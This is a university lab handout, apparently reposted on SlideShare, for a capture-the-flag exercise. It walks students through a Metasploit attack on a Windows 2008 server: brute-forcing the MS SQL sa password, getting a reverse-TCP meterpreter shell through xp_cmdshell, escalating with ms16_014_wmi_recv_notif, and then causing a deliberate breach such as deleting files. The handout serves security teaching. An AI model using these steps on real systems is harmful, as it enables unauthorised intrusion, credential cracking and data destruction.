SlideShare a Scribd company logo

P3.docx

Download as DOCX, PDF
I
IsaacMwangi25

You are tasked with gaining privileged access to a Windows 2008 server through a capture-the-flag event. You first use Metasploit to exploit vulnerable MS SQL services to get an unprivileged shell. Then, you use the exploit suggester module to find exploits for privilege escalation, using the ms16_014_wmi_recv_notif exploit to achieve a privileged shell. Finally, you perform an action like deleting important files to cause an information security breach on the target system.

Business
1 of 5
Project-3: Privilege Escalation-2 In this project, you are assigned to gain privileged access to Windows 2008 Server in a CTF (Capture-the-Flag) event. You will discover that Windows 2008 has a vulnerable MS SQL Service. First, you will exploit these services by using the Metasploit Framework to gain an unprivileged shell. You will use the "exploit suggester” module of the Metasploit Framework and try to gain a privileged shell. In your first try, you will be able to get a privileged shell. Reminder Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before starting this project. Computers Notes: 1) You will perform all of your actions from Kali Linux. 2) You cannot copy and paste between your computer and the computers on the Netlab environment; however, it will be quicker and more reliable if you use the tab key after writing the first 2-3 letters of each command/command parameters in Metasploit. 3) Use CTRL – to shrink the fonts on the Kali Linux terminal window; alternatively you can click on the View on the menu bar and then Shrink Font menu item. 4) If you get an error like "Meterpreter session # closed. Reason: Died", terminate your reservation and restart the lab unless otherwise specified. The reason for this error is the timeout of the session. IN the second reservation, go through the steps more quickly. Steps of Hacking 1) Scan the network to check for MS SQL service 2) Crack the sa password 3) Get a shell
4) Confirm that the shell is low-privileged 5) Get a high-privileged shell 6) Confirm that the shell is high-privileged 7) Gave rise to an information security breach The List of Actions/Commands per Step 1. Scan the network to check for MS SQL service In this part, scan all computers in the network for MS SQL Server service (Port 1433). Use the service detection option you used last week. Run the Nmap with the options described above and take a screenshot(s) of the result that is showing that the port is open on Windows 2008. Type the command here 2. Crack the sa password sa is the most privileged account in an SQL server. This account is usually targeted by hackers, as you will do in this part. You will use Metasploit to crack the password of the sa account in this part. Command Notes gunzip /usr/share/wordlists/rockyou.txt.gz Decompress the password dictionary msfconsole Open Metasploit search mssql_login Find a relevant Metasploit module Type the command here Type in the required command show options See a list of available options. Confirm that the username option has already been set as "sa”. But you still need to set some options.
Type the command here Set the remote host (SQL Server) to connect, and then the Metasploit module will try passwords remotely by brute-forcing Type the command here Check the username; if you see roo, you have to change it with the correct one set pass_file /usr/share/wordlists/rockyou.txt This is the password list (dictionary) you compressed. You will use this to crack the password. set verbose false Type in this command if you don't want to see a message for all failed login attempts. run Take a screenshot of the terminal window showing the password of the sa account. Note: Take a note of this password; you will use it later on. The completion of this command will take about 80 seconds. 3. Get a shell In this part, you will try to get a shell from Windows 2008 using the xp_cmdshell procedure on MS SQL Server. xp_cmdshell is a dangerous and extended procedure that enables interaction between the MS SQL server and the operating system. You can run Windows commands from SQL server and perform operations like copying files, creating folders, and many others. In this part, you will use a Metasploit payload that exploits xp_cmdshell to create a shell. search mssql_payload Search Metasploit for possible MS SQL payloads use exploit/windows/mssql/mssql_payload This is the Metasploit payload that uses the xp_cmdshell procedure on MS SQL Server show options See the possible options for this payload. By default, the username option has already been set as “sa”. Type the command here Did you see that the RHOSTS parameter is blank? Set it as Windows 2008 server. RPORT has already been set as 1433. Type the command here Set the password of the sa account you cracked in the previous part set payload windows/x64/meterpreter/reverse_tcp You have to set the payload option, although it has not been shown in the options list. This is a global option that applies mssql_payload exploit. Note that mssql_payload uses the xp_cmdshell procedure; however, it needs a mechanism to handle the MS SQL server traffic. This is similar to the analog RC car and RC remote control; remember from the Project-1. Type the command here You have to assign the local counterpart of the host. set lport 443 You have to assign the local counterpart of the port number.
run or exploit You should be getting a shell after running the exploit. 4. Confirm that the shell is low-privileged Now try some commands to check your privilege level on the shell. Commands Notes shell Switch to Windows 2008 native shell whoami See the currently logged-on user name. It is probably a low-privileged shell. Let’s try doing something that requires privileges. Type the command here Try to add a user account from the command line. Take a screenshot of the terminal window showing the result. Exit Exit from the Window 2008 shell and return to meterpreter shell 5. Get a high-privileged shell In this part, you will use the exploit suggester module to find some exploits for privilege escalation, and then use one of these exploits. background Don’t forget to note the id of the session search suggester This command is to search for the keyword “suggester” and find the correct name of the suggester module.set Type the command here Type in the correct command show options Type the command here Write the correct command run or exploit Run exploit suggester, so that it will suggest some exploits to run on the low-privileged shell to get a high-privileged shell. Type the command here Use ms16_014_wmi_recv_notif. Type in the correct command show options set session # The same session ID should put here as the one you chose for the exploit suggester. Remember, you are trying the exploits suggested by the local_exploit_suggester. run or exploit After running the exploit, you should see the message "Exploit completed, but no session was created." show options This time you will see the options of the payload (reverse_shell_tcp) Type the command here Set the first option of the payload Type the command here Set the second option of the payload option run or exploit You should be getting a shell after running the exploit. You will see a Windows shell instead of a meterpreter shell. (Press enter once)
6. Confirm that the shell is high-privileged Now check if you have the privilege to perform the dangerous actions. whoami Take a screenshot of the terminal window showing the username. 7. Gave rise to an information security breach Type the command(s) here Did something that will cause loss of confidentiality, integrity, or availability on the target system. Provide the details. Take screenshots. Please perform anything other than you did in the Project-2. (Don’t create a user account) Weekly Learning and Reflection In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this project. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.

Recommended

Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using MetasploitPrivileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Vishal Kumar
 
Different type of shells In Netapp Cluster mode 8.X and how to access them t...
Different type of shells In Netapp Cluster mode 8.X and how to access them t...Different type of shells In Netapp Cluster mode 8.X and how to access them t...
Different type of shells In Netapp Cluster mode 8.X and how to access them t...
Saroj Sahu
 
"PHP from soup to nuts" -- lab exercises
"PHP from soup to nuts" -- lab exercises"PHP from soup to nuts" -- lab exercises
"PHP from soup to nuts" -- lab exercises
rICh morrow
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
Nutan Kumar Panda
 
XPages Blast - ILUG 2010
XPages Blast - ILUG 2010XPages Blast - ILUG 2010
XPages Blast - ILUG 2010
Tim Clark
 
BestInFlowCompetitionTutorials03May2023
BestInFlowCompetitionTutorials03May2023BestInFlowCompetitionTutorials03May2023
BestInFlowCompetitionTutorials03May2023
Timothy Spann
 
Lab 1 Essay
Lab 1 EssayLab 1 Essay
Lab 1 Essay
Melissa Moore
 

Recommended

Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using MetasploitPrivileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Vishal Kumar
 
Different type of shells In Netapp Cluster mode 8.X and how to access them t...
Different type of shells In Netapp Cluster mode 8.X and how to access them t...Different type of shells In Netapp Cluster mode 8.X and how to access them t...
Different type of shells In Netapp Cluster mode 8.X and how to access them t...
Saroj Sahu
 
"PHP from soup to nuts" -- lab exercises
"PHP from soup to nuts" -- lab exercises"PHP from soup to nuts" -- lab exercises
"PHP from soup to nuts" -- lab exercises
rICh morrow
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
Nutan Kumar Panda
 
XPages Blast - ILUG 2010
XPages Blast - ILUG 2010XPages Blast - ILUG 2010
XPages Blast - ILUG 2010
Tim Clark
 
BestInFlowCompetitionTutorials03May2023
BestInFlowCompetitionTutorials03May2023BestInFlowCompetitionTutorials03May2023
BestInFlowCompetitionTutorials03May2023
Timothy Spann
 
Lab 1 Essay
Lab 1 EssayLab 1 Essay
Lab 1 Essay
Melissa Moore
 
Experimentos lab
Experimentos labExperimentos lab
Experimentos lab
George Madson Dias Santos
 
Power Shell for System Admins - By Kaustubh
Power Shell for System Admins - By KaustubhPower Shell for System Admins - By Kaustubh
Power Shell for System Admins - By Kaustubh
Kaustubh Kumar
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
wozgeass
 
MKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docx
MKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docxMKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docx
MKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docx
kendalfarrier
 
[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test
Zsolt Fabok
 
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docxPart 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
karlhennesey
 
Google Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docxGoogle Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docx
whittemorelucilla
 
Chapter 2.4
Chapter 2.4Chapter 2.4
Chapter 2.4
sotlsoc
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
Eran Goldstein
 
Handson1 6 federp
Handson1 6 federpHandson1 6 federp
Handson1 6 federp
federpmatc
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
JongWon Kim
 
Advanced Search with Solr - User Guide
Advanced Search with Solr - User GuideAdvanced Search with Solr - User Guide
Advanced Search with Solr - User Guide
Biztech Store
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
Jayesh Patel
 
Learn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdf
Learn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdfLearn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdf
Learn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdf
ClapperboardCinemaPV
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
Memory profiler and garbage collector in C#
Memory profiler and garbage collector in C#Memory profiler and garbage collector in C#
Memory profiler and garbage collector in C#
Wipro
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENT
Devil's Cafe
 
Readme
ReadmeReadme
Readme
rec2006
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark sso
laonap166
 
Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024
FelixPerez547899
 
Training my puppy and implementation in this story
Training my puppy and implementation in this storyTraining my puppy and implementation in this story
Training my puppy and implementation in this story
WilliamRodrigues148
 

More Related Content

Similar to P3.docx

Experimentos lab
Experimentos labExperimentos lab
Experimentos lab
George Madson Dias Santos
 
Power Shell for System Admins - By Kaustubh
Power Shell for System Admins - By KaustubhPower Shell for System Admins - By Kaustubh
Power Shell for System Admins - By Kaustubh
Kaustubh Kumar
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
wozgeass
 
MKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docx
MKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docxMKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docx
MKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docx
kendalfarrier
 
[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test
Zsolt Fabok
 
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docxPart 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
karlhennesey
 
Google Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docxGoogle Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docx
whittemorelucilla
 
Chapter 2.4
Chapter 2.4Chapter 2.4
Chapter 2.4
sotlsoc
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
Eran Goldstein
 
Handson1 6 federp
Handson1 6 federpHandson1 6 federp
Handson1 6 federp
federpmatc
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
JongWon Kim
 
Advanced Search with Solr - User Guide
Advanced Search with Solr - User GuideAdvanced Search with Solr - User Guide
Advanced Search with Solr - User Guide
Biztech Store
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
Jayesh Patel
 
Learn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdf
Learn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdfLearn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdf
Learn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdf
ClapperboardCinemaPV
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
Memory profiler and garbage collector in C#
Memory profiler and garbage collector in C#Memory profiler and garbage collector in C#
Memory profiler and garbage collector in C#
Wipro
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENT
Devil's Cafe
 
Readme
ReadmeReadme
Readme
rec2006
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark sso
laonap166
 

Similar to P3.docx (20)

Experimentos lab
Experimentos labExperimentos lab
Experimentos lab
 
Power Shell for System Admins - By Kaustubh
Power Shell for System Admins - By KaustubhPower Shell for System Admins - By Kaustubh
Power Shell for System Admins - By Kaustubh
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
MKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docx
MKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docxMKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docx
MKT 100Week 6 Assignment{Enter Student Name Here}{Enter Bu.docx
 
[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test[xp2013] Narrow Down What to Test
[xp2013] Narrow Down What to Test
 
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docxPart 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
Part 4 Scripting and Virtualization (due Week 7)Objectives1. .docx
 
Google Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docxGoogle Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docx
 
Chapter 2.4
Chapter 2.4Chapter 2.4
Chapter 2.4
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
 
Handson1 6 federp
Handson1 6 federpHandson1 6 federp
Handson1 6 federp
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
 
Advanced Search with Solr - User Guide
Advanced Search with Solr - User GuideAdvanced Search with Solr - User Guide
Advanced Search with Solr - User Guide
 
Metasploit
MetasploitMetasploit
Metasploit
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
 
Learn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdf
Learn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdfLearn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdf
Learn Powershell Scripting Tutorial Full Course 1dollarcart.com.pdf
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Memory profiler and garbage collector in C#
Memory profiler and garbage collector in C#Memory profiler and garbage collector in C#
Memory profiler and garbage collector in C#
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENT
 
Readme
ReadmeReadme
Readme
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark sso
 

Recently uploaded

Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024
FelixPerez547899
 
Training my puppy and implementation in this story
Training my puppy and implementation in this storyTraining my puppy and implementation in this story
Training my puppy and implementation in this story
WilliamRodrigues148
 
Lundin Gold Corporate Presentation - June 2024
Lundin Gold Corporate Presentation - June 2024Lundin Gold Corporate Presentation - June 2024
Lundin Gold Corporate Presentation - June 2024
Adnet Communications
 
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdfikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
agatadrynko
 
Organizational Change Leadership Agile Tour Geneve 2024
Organizational Change Leadership Agile Tour Geneve 2024Organizational Change Leadership Agile Tour Geneve 2024
Organizational Change Leadership Agile Tour Geneve 2024
Kirill Klimov
 
3 Simple Steps To Buy Verified Payoneer Account In 2024
3 Simple Steps To Buy Verified Payoneer Account In 20243 Simple Steps To Buy Verified Payoneer Account In 2024
3 Simple Steps To Buy Verified Payoneer Account In 2024
SEOSMMEARTH
 
Top mailing list providers in the USA.pptx
Top mailing list providers in the USA.pptxTop mailing list providers in the USA.pptx
Top mailing list providers in the USA.pptx
JeremyPeirce1
 
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challengesEvent Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Holger Mueller
 
Dpboss Matka Guessing Satta Matta Matka Kalyan Chart Satta Matka
Dpboss Matka Guessing Satta Matta Matka Kalyan Chart Satta MatkaDpboss Matka Guessing Satta Matta Matka Kalyan Chart Satta Matka
Dpboss Matka Guessing Satta Matta Matka Kalyan Chart Satta Matka
➒➌➎➏➑➐➋➑➐➐Dpboss Matka Guessing Satta Matka Kalyan Chart Indian Matka
 
Unveiling the Dynamic Personalities, Key Dates, and Horoscope Insights: Gemin...
Unveiling the Dynamic Personalities, Key Dates, and Horoscope Insights: Gemin...Unveiling the Dynamic Personalities, Key Dates, and Horoscope Insights: Gemin...
Unveiling the Dynamic Personalities, Key Dates, and Horoscope Insights: Gemin...
my Pandit
 
Understanding User Needs and Satisfying Them
Understanding User Needs and Satisfying ThemUnderstanding User Needs and Satisfying Them
Understanding User Needs and Satisfying Them
Aggregage
 
FIA officials brutally tortured innocent and snatched 200 Bitcoins of worth 4...
FIA officials brutally tortured innocent and snatched 200 Bitcoins of worth 4...FIA officials brutally tortured innocent and snatched 200 Bitcoins of worth 4...
FIA officials brutally tortured innocent and snatched 200 Bitcoins of worth 4...
jamalseoexpert1978
 
BeMetals Investor Presentation_June 1, 2024.pdf
BeMetals Investor Presentation_June 1, 2024.pdfBeMetals Investor Presentation_June 1, 2024.pdf
BeMetals Investor Presentation_June 1, 2024.pdf
DerekIwanaka1
 
amptalk_RecruitingDeck_english_2024.06.05
amptalk_RecruitingDeck_english_2024.06.05amptalk_RecruitingDeck_english_2024.06.05
amptalk_RecruitingDeck_english_2024.06.05
marketing317746
 
Observation Lab PowerPoint Assignment for TEM 431
Observation Lab PowerPoint Assignment for TEM 431Observation Lab PowerPoint Assignment for TEM 431
Observation Lab PowerPoint Assignment for TEM 431
ecamare2
 
ikea_woodgreen_petscharity_dog-alogue_digital.pdf
ikea_woodgreen_petscharity_dog-alogue_digital.pdfikea_woodgreen_petscharity_dog-alogue_digital.pdf
ikea_woodgreen_petscharity_dog-alogue_digital.pdf
agatadrynko
 
Satta Matka Dpboss Matka Guessing Kalyan Chart Indian Matka Kalyan panel Chart
Satta Matka Dpboss Matka Guessing Kalyan Chart Indian Matka Kalyan panel ChartSatta Matka Dpboss Matka Guessing Kalyan Chart Indian Matka Kalyan panel Chart
Satta Matka Dpboss Matka Guessing Kalyan Chart Indian Matka Kalyan panel Chart
➒➌➎➏➑➐➋➑➐➐Dpboss Matka Guessing Satta Matka Kalyan Chart Indian Matka
 
The effects of customers service quality and online reviews on customer loyal...
The effects of customers service quality and online reviews on customer loyal...The effects of customers service quality and online reviews on customer loyal...
The effects of customers service quality and online reviews on customer loyal...
balatucanapplelovely
 
buy old yahoo accounts buy yahoo accounts
buy old yahoo accounts buy yahoo accountsbuy old yahoo accounts buy yahoo accounts
buy old yahoo accounts buy yahoo accounts
Susan Laney
 
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
SOFTTECHHUB
 

Recently uploaded (20)

Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024
 
Training my puppy and implementation in this story
Training my puppy and implementation in this storyTraining my puppy and implementation in this story
Training my puppy and implementation in this story
 
Lundin Gold Corporate Presentation - June 2024
Lundin Gold Corporate Presentation - June 2024Lundin Gold Corporate Presentation - June 2024
Lundin Gold Corporate Presentation - June 2024
 
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdfikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
 
Organizational Change Leadership Agile Tour Geneve 2024
Organizational Change Leadership Agile Tour Geneve 2024Organizational Change Leadership Agile Tour Geneve 2024
Organizational Change Leadership Agile Tour Geneve 2024
 
3 Simple Steps To Buy Verified Payoneer Account In 2024
3 Simple Steps To Buy Verified Payoneer Account In 20243 Simple Steps To Buy Verified Payoneer Account In 2024
3 Simple Steps To Buy Verified Payoneer Account In 2024
 
Top mailing list providers in the USA.pptx
Top mailing list providers in the USA.pptxTop mailing list providers in the USA.pptx
Top mailing list providers in the USA.pptx
 
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challengesEvent Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
Event Report - SAP Sapphire 2024 Orlando - lots of innovation and old challenges
 
Dpboss Matka Guessing Satta Matta Matka Kalyan Chart Satta Matka
Dpboss Matka Guessing Satta Matta Matka Kalyan Chart Satta MatkaDpboss Matka Guessing Satta Matta Matka Kalyan Chart Satta Matka
Dpboss Matka Guessing Satta Matta Matka Kalyan Chart Satta Matka
 
Unveiling the Dynamic Personalities, Key Dates, and Horoscope Insights: Gemin...
Unveiling the Dynamic Personalities, Key Dates, and Horoscope Insights: Gemin...Unveiling the Dynamic Personalities, Key Dates, and Horoscope Insights: Gemin...
Unveiling the Dynamic Personalities, Key Dates, and Horoscope Insights: Gemin...
 
Understanding User Needs and Satisfying Them
Understanding User Needs and Satisfying ThemUnderstanding User Needs and Satisfying Them
Understanding User Needs and Satisfying Them
 
FIA officials brutally tortured innocent and snatched 200 Bitcoins of worth 4...
FIA officials brutally tortured innocent and snatched 200 Bitcoins of worth 4...FIA officials brutally tortured innocent and snatched 200 Bitcoins of worth 4...
FIA officials brutally tortured innocent and snatched 200 Bitcoins of worth 4...
 
BeMetals Investor Presentation_June 1, 2024.pdf
BeMetals Investor Presentation_June 1, 2024.pdfBeMetals Investor Presentation_June 1, 2024.pdf
BeMetals Investor Presentation_June 1, 2024.pdf
 
amptalk_RecruitingDeck_english_2024.06.05
amptalk_RecruitingDeck_english_2024.06.05amptalk_RecruitingDeck_english_2024.06.05
amptalk_RecruitingDeck_english_2024.06.05
 
Observation Lab PowerPoint Assignment for TEM 431
Observation Lab PowerPoint Assignment for TEM 431Observation Lab PowerPoint Assignment for TEM 431
Observation Lab PowerPoint Assignment for TEM 431
 
ikea_woodgreen_petscharity_dog-alogue_digital.pdf
ikea_woodgreen_petscharity_dog-alogue_digital.pdfikea_woodgreen_petscharity_dog-alogue_digital.pdf
ikea_woodgreen_petscharity_dog-alogue_digital.pdf
 
Satta Matka Dpboss Matka Guessing Kalyan Chart Indian Matka Kalyan panel Chart
Satta Matka Dpboss Matka Guessing Kalyan Chart Indian Matka Kalyan panel ChartSatta Matka Dpboss Matka Guessing Kalyan Chart Indian Matka Kalyan panel Chart
Satta Matka Dpboss Matka Guessing Kalyan Chart Indian Matka Kalyan panel Chart
 
The effects of customers service quality and online reviews on customer loyal...
The effects of customers service quality and online reviews on customer loyal...The effects of customers service quality and online reviews on customer loyal...
The effects of customers service quality and online reviews on customer loyal...
 
buy old yahoo accounts buy yahoo accounts
buy old yahoo accounts buy yahoo accountsbuy old yahoo accounts buy yahoo accounts
buy old yahoo accounts buy yahoo accounts
 
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
 

P3.docx

  • 1. Project-3: Privilege Escalation-2 In this project, you are assigned to gain privileged access to Windows 2008 Server in a CTF (Capture-the-Flag) event. You will discover that Windows 2008 has a vulnerable MS SQL Service. First, you will exploit these services by using the Metasploit Framework to gain an unprivileged shell. You will use the "exploit suggester” module of the Metasploit Framework and try to gain a privileged shell. In your first try, you will be able to get a privileged shell. Reminder Please skim the specified chapters of the book (Metasploit 5.0 for beginners 2nd ed.) before starting this project. Computers Notes: 1) You will perform all of your actions from Kali Linux. 2) You cannot copy and paste between your computer and the computers on the Netlab environment; however, it will be quicker and more reliable if you use the tab key after writing the first 2-3 letters of each command/command parameters in Metasploit. 3) Use CTRL – to shrink the fonts on the Kali Linux terminal window; alternatively you can click on the View on the menu bar and then Shrink Font menu item. 4) If you get an error like "Meterpreter session # closed. Reason: Died", terminate your reservation and restart the lab unless otherwise specified. The reason for this error is the timeout of the session. IN the second reservation, go through the steps more quickly. Steps of Hacking 1) Scan the network to check for MS SQL service 2) Crack the sa password 3) Get a shell
  • 2. 4) Confirm that the shell is low-privileged 5) Get a high-privileged shell 6) Confirm that the shell is high-privileged 7) Gave rise to an information security breach The List of Actions/Commands per Step 1. Scan the network to check for MS SQL service In this part, scan all computers in the network for MS SQL Server service (Port 1433). Use the service detection option you used last week. Run the Nmap with the options described above and take a screenshot(s) of the result that is showing that the port is open on Windows 2008. Type the command here 2. Crack the sa password sa is the most privileged account in an SQL server. This account is usually targeted by hackers, as you will do in this part. You will use Metasploit to crack the password of the sa account in this part. Command Notes gunzip /usr/share/wordlists/rockyou.txt.gz Decompress the password dictionary msfconsole Open Metasploit search mssql_login Find a relevant Metasploit module Type the command here Type in the required command show options See a list of available options. Confirm that the username option has already been set as "sa”. But you still need to set some options.
